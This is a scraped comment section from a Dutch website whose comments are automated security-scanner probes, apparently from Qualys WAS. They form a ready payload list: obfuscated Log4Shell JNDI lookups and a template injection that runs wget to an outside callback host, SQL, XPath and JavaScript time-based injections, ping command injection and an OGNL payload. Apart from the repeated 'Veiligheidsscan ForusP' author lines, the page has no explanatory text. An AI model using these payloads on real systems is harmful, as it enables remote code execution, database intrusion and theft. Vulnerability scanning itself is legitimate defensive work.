${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://2059b1f2255e32017cad77a4b52e8db495578c28.1768425210231792.3455111963.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}
1

8 december 2023 | Beantwoorden

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://27542760eb03984959353453311c8bcfcca666c9.1768425210231792.1888016097.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
1

8 december 2023 | Beantwoorden

${j${::-n}di:ldap${::-:}//564fc2e865493c5f700af21eed18c922fcef84f7.1768425210231792.347913168.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}
1

8 december 2023 | Beantwoorden

${jnd${123%ff:-${123%ff:-i:}}ldap://59cf730340f2f0a986f761ae3d7fe0d55e671723.1768425210231792.3171074698.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}
1

8 december 2023 | Beantwoorden

${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//dabf16dfedac82ce205b7e52760f8dcc55664b2f.1768425210231792.2803168822.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}
1

8 december 2023 | Beantwoorden

${jndi:dns://e2333964323c79682690f4b6ab1a51cfe01d205a.1768425210231792.1618199424.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
1

8 december 2023 | Beantwoorden

${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//e8c3e0949ea5bfbc2fa90db7dab75c6fa0b55a54.1768425210231792.3987385491.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}
1

8 december 2023 | Beantwoorden

${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://136ce6054c88125bdfdf2db9a3642dc27455ab11.1768425210231792.1401039065.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}
1

8 december 2023 | Beantwoorden

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://d641aabe9f5be2f3f07b7d895b2b95b4792bd56c.1768425210231792.319058485.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
1

8 december 2023 | Beantwoorden

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://75f800f60f32f31dec080ac2ac2f16b9b54324dc.1768425210231792.2692207719.oscomm15019101.oscomm.eu1.qualysperiscope.com.’).read() }}
1

8 december 2023 | Beantwoorden

1′) or 2634=2634 —
1

8 december 2023 | Beantwoorden

1′ or 3789=3789 —
1

8 december 2023 | Beantwoorden

1 or 4325=4325 —
1

8 december 2023 | Beantwoorden

1 or NULL IS NULL
1

8 december 2023 | Beantwoorden

1 and NULL IS NULL
1

9 december 2023 | Beantwoorden

1′) or ‘swqtp’=’swqtp
1

9 december 2023 | Beantwoorden

1′ or ‘tpklq’=’tpklq
1

9 december 2023 | Beantwoorden

11 or 11=11
1

9 december 2023 | Beantwoorden

1′ or true() or ‘and’ = ‘and
1

9 december 2023 | Beantwoorden

1 or true() or ‘and’ = ‘and’
1

9 december 2023 | Beantwoorden

1″ or true() or “and” = “and
1

9 december 2023 | Beantwoorden

aaaa&ping -n 92 localhost&
1

9 december 2023 | Beantwoorden

ping -c2 -i91 localhost
1

9 december 2023 | Beantwoorden

|ping -c2 -i56 localhost
1

9 december 2023 | Beantwoorden

|ping -c2 -i91 localhost|
1

9 december 2023 | Beantwoorden

1WAITFOR DELAY ’00:00:29′
1

9 december 2023 | Beantwoorden

1;WAITFOR DELAY ’00:00:29′;
1

9 december 2023 | Beantwoorden

1);WAITFOR DELAY ’00:00:29′–
1

9 december 2023 | Beantwoorden

1′;WAITFOR DELAY ’00:00:29′–
1

9 december 2023 | Beantwoorden

1′);WAITFOR DELAY ’00:00:29′–
1

9 december 2023 | Beantwoorden

1′,0,0);WAITFOR DELAY’00:00:29′–
1

9 december 2023 | Beantwoorden

1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1

9 december 2023 | Beantwoorden

1′ + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ‘
1

9 december 2023 | Beantwoorden

1;SELECT sleep(29); —
1

9 december 2023 | Beantwoorden

1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*’XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR’|”XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR”*/
1

9 december 2023 | Beantwoorden

1′ WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)– prime
1

9 december 2023 | Beantwoorden

1′ OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND ‘qualys’=’qualys
1

9 december 2023 | Beantwoorden

1′; var djci=sleep(29*1000);//
1

9 december 2023 | Beantwoorden

1′; var djci=sleep(29*1000) + ‘
1

9 december 2023 | Beantwoorden

1′ + sleep(29*100*Math.sqrt(100)) + ‘
1

9 december 2023 | Beantwoorden

1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))

231 Responses

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP

Veiligheidsscan ForusP